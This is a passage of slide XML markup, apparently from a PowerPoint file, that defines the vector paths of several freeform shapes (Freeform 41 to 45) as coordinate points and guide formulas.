                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="582"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="556"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="535"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="535"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="472"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="231" y="210"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="169" y="167"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="227" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="284" y="130"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="378" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="494" y="83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0" name="Freeform 41"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6534150" y="1652588"/>
                <a:ext cx="293688" cy="292100"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 372 w 814"/>
                  <a:gd name="T1" fmla="*/ 89 h 810"/>
                  <a:gd name="T2" fmla="*/ 168 w 814"/>
                  <a:gd name="T3" fmla="*/ 441 h 810"/>
                  <a:gd name="T4" fmla="*/ 173 w 814"/>
                  <a:gd name="T5" fmla="*/ 441 h 810"/>
                  <a:gd name="T6" fmla="*/ 477 w 814"/>
                  <a:gd name="T7" fmla="*/ 178 h 810"/>
                  <a:gd name="T8" fmla="*/ 598 w 814"/>
                  <a:gd name="T9" fmla="*/ 278 h 810"/>
                  <a:gd name="T10" fmla="*/ 404 w 814"/>
                  <a:gd name="T11" fmla="*/ 630 h 810"/>
                  <a:gd name="T12" fmla="*/ 404 w 814"/>
                  <a:gd name="T13" fmla="*/ 630 h 810"/>
                  <a:gd name="T14" fmla="*/ 708 w 814"/>
                  <a:gd name="T15" fmla="*/ 368 h 810"/>
                  <a:gd name="T16" fmla="*/ 813 w 814"/>
                  <a:gd name="T17" fmla="*/ 457 h 810"/>
                  <a:gd name="T18" fmla="*/ 367 w 814"/>
                  <a:gd name="T19" fmla="*/ 809 h 810"/>
                  <a:gd name="T20" fmla="*/ 241 w 814"/>
                  <a:gd name="T21" fmla="*/ 709 h 810"/>
                  <a:gd name="T22" fmla="*/ 435 w 814"/>
                  <a:gd name="T23" fmla="*/ 352 h 810"/>
                  <a:gd name="T24" fmla="*/ 435 w 814"/>
                  <a:gd name="T25" fmla="*/ 352 h 810"/>
                  <a:gd name="T26" fmla="*/ 125 w 814"/>
                  <a:gd name="T27" fmla="*/ 614 h 810"/>
                  <a:gd name="T28" fmla="*/ 0 w 814"/>
                  <a:gd name="T29" fmla="*/ 509 h 810"/>
                  <a:gd name="T30" fmla="*/ 262 w 814"/>
                  <a:gd name="T31" fmla="*/ 0 h 810"/>
                  <a:gd name="T32" fmla="*/ 372 w 814"/>
                  <a:gd name="T33" fmla="*/ 89 h 8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14" h="810">
                    <a:moveTo>
                      <a:pt x="372" y="89"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="168" y="441"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="173" y="441"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="477" y="178"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="598" y="278"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="404" y="630"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="404" y="630"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="708" y="368"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="813" y="457"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="367" y="809"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="241" y="709"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="435" y="352"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="435" y="352"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="125" y="614"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="509"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="262" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="372" y="89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1" name="Freeform 42"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6729413" y="1862138"/>
                <a:ext cx="203200" cy="201612"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 221 w 563"/>
                  <a:gd name="T1" fmla="*/ 43 h 558"/>
                  <a:gd name="T2" fmla="*/ 310 w 563"/>
                  <a:gd name="T3" fmla="*/ 6 h 558"/>
                  <a:gd name="T4" fmla="*/ 357 w 563"/>
                  <a:gd name="T5" fmla="*/ 0 h 558"/>
                  <a:gd name="T6" fmla="*/ 400 w 563"/>
                  <a:gd name="T7" fmla="*/ 11 h 558"/>
                  <a:gd name="T8" fmla="*/ 489 w 563"/>
                  <a:gd name="T9" fmla="*/ 69 h 558"/>
                  <a:gd name="T10" fmla="*/ 525 w 563"/>
                  <a:gd name="T11" fmla="*/ 117 h 558"/>
                  <a:gd name="T12" fmla="*/ 551 w 563"/>
                  <a:gd name="T13" fmla="*/ 158 h 558"/>
                  <a:gd name="T14" fmla="*/ 562 w 563"/>
                  <a:gd name="T15" fmla="*/ 200 h 558"/>
                  <a:gd name="T16" fmla="*/ 562 w 563"/>
                  <a:gd name="T17" fmla="*/ 247 h 558"/>
                  <a:gd name="T18" fmla="*/ 547 w 563"/>
                  <a:gd name="T19" fmla="*/ 290 h 558"/>
                  <a:gd name="T20" fmla="*/ 520 w 563"/>
                  <a:gd name="T21" fmla="*/ 337 h 558"/>
                  <a:gd name="T22" fmla="*/ 436 w 563"/>
                  <a:gd name="T23" fmla="*/ 437 h 558"/>
                  <a:gd name="T24" fmla="*/ 389 w 563"/>
                  <a:gd name="T25" fmla="*/ 484 h 558"/>
                  <a:gd name="T26" fmla="*/ 342 w 563"/>
                  <a:gd name="T27" fmla="*/ 521 h 558"/>
                  <a:gd name="T28" fmla="*/ 253 w 563"/>
                  <a:gd name="T29" fmla="*/ 557 h 558"/>
                  <a:gd name="T30" fmla="*/ 205 w 563"/>
                  <a:gd name="T31" fmla="*/ 557 h 558"/>
                  <a:gd name="T32" fmla="*/ 163 w 563"/>
                  <a:gd name="T33" fmla="*/ 547 h 558"/>
                  <a:gd name="T34" fmla="*/ 79 w 563"/>
                  <a:gd name="T35" fmla="*/ 489 h 558"/>
                  <a:gd name="T36" fmla="*/ 37 w 563"/>
                  <a:gd name="T37" fmla="*/ 447 h 558"/>
                  <a:gd name="T38" fmla="*/ 11 w 563"/>
                  <a:gd name="T39" fmla="*/ 400 h 558"/>
                  <a:gd name="T40" fmla="*/ 0 w 563"/>
                  <a:gd name="T41" fmla="*/ 358 h 558"/>
                  <a:gd name="T42" fmla="*/ 0 w 563"/>
                  <a:gd name="T43" fmla="*/ 316 h 558"/>
                  <a:gd name="T44" fmla="*/ 16 w 563"/>
                  <a:gd name="T45" fmla="*/ 274 h 558"/>
                  <a:gd name="T46" fmla="*/ 43 w 563"/>
                  <a:gd name="T47" fmla="*/ 227 h 558"/>
                  <a:gd name="T48" fmla="*/ 121 w 563"/>
                  <a:gd name="T49" fmla="*/ 127 h 558"/>
                  <a:gd name="T50" fmla="*/ 174 w 563"/>
                  <a:gd name="T51" fmla="*/ 80 h 558"/>
                  <a:gd name="T52" fmla="*/ 174 w 563"/>
                  <a:gd name="T53" fmla="*/ 284 h 558"/>
                  <a:gd name="T54" fmla="*/ 153 w 563"/>
                  <a:gd name="T55" fmla="*/ 311 h 558"/>
                  <a:gd name="T56" fmla="*/ 137 w 563"/>
                  <a:gd name="T57" fmla="*/ 337 h 558"/>
                  <a:gd name="T58" fmla="*/ 121 w 563"/>
                  <a:gd name="T59" fmla="*/ 384 h 558"/>
                  <a:gd name="T60" fmla="*/ 127 w 563"/>
                  <a:gd name="T61" fmla="*/ 400 h 558"/>
                  <a:gd name="T62" fmla="*/ 142 w 563"/>
                  <a:gd name="T63" fmla="*/ 421 h 558"/>
                  <a:gd name="T64" fmla="*/ 179 w 563"/>
                  <a:gd name="T65" fmla="*/ 437 h 558"/>
                  <a:gd name="T66" fmla="*/ 216 w 563"/>
                  <a:gd name="T67" fmla="*/ 431 h 558"/>
                  <a:gd name="T68" fmla="*/ 242 w 563"/>
                  <a:gd name="T69" fmla="*/ 415 h 558"/>
                  <a:gd name="T70" fmla="*/ 337 w 563"/>
                  <a:gd name="T71" fmla="*/ 337 h 558"/>
                  <a:gd name="T72" fmla="*/ 394 w 563"/>
                  <a:gd name="T73" fmla="*/ 268 h 558"/>
                  <a:gd name="T74" fmla="*/ 431 w 563"/>
                  <a:gd name="T75" fmla="*/ 216 h 558"/>
                  <a:gd name="T76" fmla="*/ 436 w 563"/>
                  <a:gd name="T77" fmla="*/ 195 h 558"/>
                  <a:gd name="T78" fmla="*/ 431 w 563"/>
                  <a:gd name="T79" fmla="*/ 158 h 558"/>
                  <a:gd name="T80" fmla="*/ 421 w 563"/>
                  <a:gd name="T81" fmla="*/ 143 h 558"/>
                  <a:gd name="T82" fmla="*/ 378 w 563"/>
                  <a:gd name="T83" fmla="*/ 121 h 558"/>
                  <a:gd name="T84" fmla="*/ 357 w 563"/>
                  <a:gd name="T85" fmla="*/ 127 h 558"/>
                  <a:gd name="T86" fmla="*/ 331 w 563"/>
                  <a:gd name="T87" fmla="*/ 132 h 558"/>
                  <a:gd name="T88" fmla="*/ 284 w 563"/>
                  <a:gd name="T89" fmla="*/ 174 h 558"/>
                  <a:gd name="T90" fmla="*/ 226 w 563"/>
                  <a:gd name="T91" fmla="*/ 227 h 558"/>
                  <a:gd name="T92" fmla="*/ 174 w 563"/>
                  <a:gd name="T93" fmla="*/ 284 h 5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563" h="558">
                    <a:moveTo>
                      <a:pt x="221" y="43"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="221" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="268" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="310" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="310" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="357" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="400" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="400" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="441" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="489" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="489" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="525" y="117"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="551" y="158"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="551" y="158"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="557" y="179"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="562" y="200"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="562" y="221"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="562" y="247"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="562" y="247"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="547" y="290"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="520" y="337"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="520" y="337"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="484" y="384"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="436" y="437"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="436" y="437"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="389" y="484"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="342" y="521"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="342" y="521"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="294" y="541"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="253" y="557"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="253" y="557"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="205" y="557"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="163" y="547"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="163" y="547"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="526"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="489"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="489"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="447"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="400"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="400"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="379"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="358"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="337"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="316"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="316"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="274"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="227"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="227"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="179"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="127"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="127"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="174" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="221" y="43"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="174" y="284"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="174" y="284"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="153" y="311"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="137" y="337"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="137" y="337"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="127" y="358"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="384"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="384"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="127" y="400"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="421"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="421"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="158" y="431"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="179" y="437"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="195" y="437"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="216" y="431"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="216" y="431"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="242" y="415"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="268" y="394"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="337" y="337"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="337" y="337"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="394" y="268"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="415" y="242"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="431" y="216"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="431" y="216"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="436" y="195"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="436" y="174"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="431" y="158"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="421" y="143"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="421" y="143"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="400" y="127"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="378" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="378" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="357" y="127"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="331" y="132"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="331" y="132"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="310" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="284" y="174"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="284" y="174"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="226" y="227"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="226" y="227"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="174" y="284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2" name="Freeform 43"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6834188" y="1976438"/>
                <a:ext cx="223837" cy="173037"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 509 w 621"/>
                  <a:gd name="T1" fmla="*/ 99 h 479"/>
                  <a:gd name="T2" fmla="*/ 452 w 621"/>
                  <a:gd name="T3" fmla="*/ 147 h 479"/>
                  <a:gd name="T4" fmla="*/ 452 w 621"/>
                  <a:gd name="T5" fmla="*/ 152 h 479"/>
                  <a:gd name="T6" fmla="*/ 452 w 621"/>
                  <a:gd name="T7" fmla="*/ 152 h 479"/>
                  <a:gd name="T8" fmla="*/ 499 w 621"/>
                  <a:gd name="T9" fmla="*/ 147 h 479"/>
                  <a:gd name="T10" fmla="*/ 536 w 621"/>
                  <a:gd name="T11" fmla="*/ 147 h 479"/>
                  <a:gd name="T12" fmla="*/ 536 w 621"/>
                  <a:gd name="T13" fmla="*/ 147 h 479"/>
                  <a:gd name="T14" fmla="*/ 556 w 621"/>
                  <a:gd name="T15" fmla="*/ 152 h 479"/>
                  <a:gd name="T16" fmla="*/ 573 w 621"/>
                  <a:gd name="T17" fmla="*/ 162 h 479"/>
                  <a:gd name="T18" fmla="*/ 588 w 621"/>
                  <a:gd name="T19" fmla="*/ 173 h 479"/>
                  <a:gd name="T20" fmla="*/ 604 w 621"/>
                  <a:gd name="T21" fmla="*/ 189 h 479"/>
                  <a:gd name="T22" fmla="*/ 604 w 621"/>
                  <a:gd name="T23" fmla="*/ 189 h 479"/>
                  <a:gd name="T24" fmla="*/ 614 w 621"/>
                  <a:gd name="T25" fmla="*/ 194 h 479"/>
                  <a:gd name="T26" fmla="*/ 614 w 621"/>
                  <a:gd name="T27" fmla="*/ 194 h 479"/>
                  <a:gd name="T28" fmla="*/ 620 w 621"/>
                  <a:gd name="T29" fmla="*/ 210 h 479"/>
                  <a:gd name="T30" fmla="*/ 520 w 621"/>
                  <a:gd name="T31" fmla="*/ 299 h 479"/>
                  <a:gd name="T32" fmla="*/ 520 w 621"/>
                  <a:gd name="T33" fmla="*/ 299 h 479"/>
                  <a:gd name="T34" fmla="*/ 504 w 621"/>
                  <a:gd name="T35" fmla="*/ 283 h 479"/>
                  <a:gd name="T36" fmla="*/ 504 w 621"/>
                  <a:gd name="T37" fmla="*/ 283 h 479"/>
                  <a:gd name="T38" fmla="*/ 494 w 621"/>
                  <a:gd name="T39" fmla="*/ 262 h 479"/>
                  <a:gd name="T40" fmla="*/ 494 w 621"/>
                  <a:gd name="T41" fmla="*/ 262 h 479"/>
                  <a:gd name="T42" fmla="*/ 462 w 621"/>
                  <a:gd name="T43" fmla="*/ 241 h 479"/>
                  <a:gd name="T44" fmla="*/ 462 w 621"/>
                  <a:gd name="T45" fmla="*/ 241 h 479"/>
                  <a:gd name="T46" fmla="*/ 446 w 621"/>
                  <a:gd name="T47" fmla="*/ 231 h 479"/>
                  <a:gd name="T48" fmla="*/ 426 w 621"/>
                  <a:gd name="T49" fmla="*/ 225 h 479"/>
                  <a:gd name="T50" fmla="*/ 426 w 621"/>
                  <a:gd name="T51" fmla="*/ 225 h 479"/>
                  <a:gd name="T52" fmla="*/ 409 w 621"/>
                  <a:gd name="T53" fmla="*/ 225 h 479"/>
                  <a:gd name="T54" fmla="*/ 389 w 621"/>
                  <a:gd name="T55" fmla="*/ 231 h 479"/>
                  <a:gd name="T56" fmla="*/ 389 w 621"/>
                  <a:gd name="T57" fmla="*/ 231 h 479"/>
                  <a:gd name="T58" fmla="*/ 368 w 621"/>
                  <a:gd name="T59" fmla="*/ 236 h 479"/>
                  <a:gd name="T60" fmla="*/ 347 w 621"/>
                  <a:gd name="T61" fmla="*/ 252 h 479"/>
                  <a:gd name="T62" fmla="*/ 95 w 621"/>
                  <a:gd name="T63" fmla="*/ 478 h 479"/>
                  <a:gd name="T64" fmla="*/ 0 w 621"/>
                  <a:gd name="T65" fmla="*/ 372 h 479"/>
                  <a:gd name="T66" fmla="*/ 415 w 621"/>
                  <a:gd name="T67" fmla="*/ 0 h 479"/>
                  <a:gd name="T68" fmla="*/ 509 w 621"/>
                  <a:gd name="T69" fmla="*/ 99 h 4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21" h="479">
                    <a:moveTo>
                      <a:pt x="509" y="99"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="452" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="452" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="452" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="499" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="536" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="536" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="556" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="573" y="162"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="588" y="173"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="604" y="189"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="604" y="189"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="614" y="194"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="614" y="194"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="620" y="210"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="520" y="299"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="520" y="299"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="504" y="283"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="504" y="283"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="494" y="262"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="494" y="262"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="462" y="241"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="462" y="241"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="446" y="231"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="426" y="225"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="426" y="225"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="409" y="225"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="389" y="231"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="389" y="231"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="368" y="236"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="347" y="252"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="95" y="478"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="372"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="415" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="509" y="99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3" name="Freeform 44"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6913563" y="2030413"/>
                <a:ext cx="258762" cy="301625"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 362 w 720"/>
                  <a:gd name="T1" fmla="*/ 357 h 836"/>
                  <a:gd name="T2" fmla="*/ 367 w 720"/>
                  <a:gd name="T3" fmla="*/ 362 h 836"/>
                  <a:gd name="T4" fmla="*/ 619 w 720"/>
                  <a:gd name="T5" fmla="*/ 341 h 836"/>
                  <a:gd name="T6" fmla="*/ 719 w 720"/>
                  <a:gd name="T7" fmla="*/ 467 h 836"/>
                  <a:gd name="T8" fmla="*/ 446 w 720"/>
                  <a:gd name="T9" fmla="*/ 478 h 836"/>
                  <a:gd name="T10" fmla="*/ 299 w 720"/>
                  <a:gd name="T11" fmla="*/ 835 h 836"/>
                  <a:gd name="T12" fmla="*/ 199 w 720"/>
                  <a:gd name="T13" fmla="*/ 709 h 836"/>
                  <a:gd name="T14" fmla="*/ 305 w 720"/>
                  <a:gd name="T15" fmla="*/ 473 h 836"/>
                  <a:gd name="T16" fmla="*/ 220 w 720"/>
                  <a:gd name="T17" fmla="*/ 478 h 836"/>
                  <a:gd name="T18" fmla="*/ 89 w 720"/>
                  <a:gd name="T19" fmla="*/ 577 h 836"/>
                  <a:gd name="T20" fmla="*/ 0 w 720"/>
                  <a:gd name="T21" fmla="*/ 467 h 836"/>
                  <a:gd name="T22" fmla="*/ 582 w 720"/>
                  <a:gd name="T23" fmla="*/ 0 h 836"/>
                  <a:gd name="T24" fmla="*/ 672 w 720"/>
                  <a:gd name="T25" fmla="*/ 116 h 836"/>
                  <a:gd name="T26" fmla="*/ 362 w 720"/>
                  <a:gd name="T27" fmla="*/ 357 h 8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20" h="836">
                    <a:moveTo>
                      <a:pt x="362" y="357"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="367" y="362"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="619" y="341"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="719" y="467"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="446" y="478"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="299" y="835"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="199" y="709"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="305" y="473"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="220" y="478"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="577"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="467"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="582" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="672" y="116"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="362" y="357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4" name="Freeform 45"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7096125" y="2289175"/>
                <a:ext cx="271463" cy="239713"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 157 w 752"/>
                  <a:gd name="T1" fmla="*/ 368 h 668"/>
                  <a:gd name="T2" fmla="*/ 131 w 752"/>
                  <a:gd name="T3" fmla="*/ 399 h 668"/>
                  <a:gd name="T4" fmla="*/ 131 w 752"/>
                  <a:gd name="T5" fmla="*/ 436 h 668"/>
                  <a:gd name="T6" fmla="*/ 152 w 752"/>
                  <a:gd name="T7" fmla="*/ 483 h 668"/>
                  <a:gd name="T8" fmla="*/ 200 w 752"/>
                  <a:gd name="T9" fmla="*/ 520 h 668"/>
                  <a:gd name="T10" fmla="*/ 237 w 752"/>
                  <a:gd name="T11" fmla="*/ 525 h 668"/>
                  <a:gd name="T12" fmla="*/ 273 w 752"/>
                  <a:gd name="T13" fmla="*/ 510 h 668"/>
                  <a:gd name="T14" fmla="*/ 310 w 752"/>
                  <a:gd name="T15" fmla="*/ 478 h 668"/>
                  <a:gd name="T16" fmla="*/ 326 w 752"/>
                  <a:gd name="T17" fmla="*/ 441 h 668"/>
                  <a:gd name="T18" fmla="*/ 326 w 752"/>
                  <a:gd name="T19" fmla="*/ 394 h 668"/>
                  <a:gd name="T20" fmla="*/ 299 w 752"/>
                  <a:gd name="T21" fmla="*/ 279 h 668"/>
                  <a:gd name="T22" fmla="*/ 294 w 752"/>
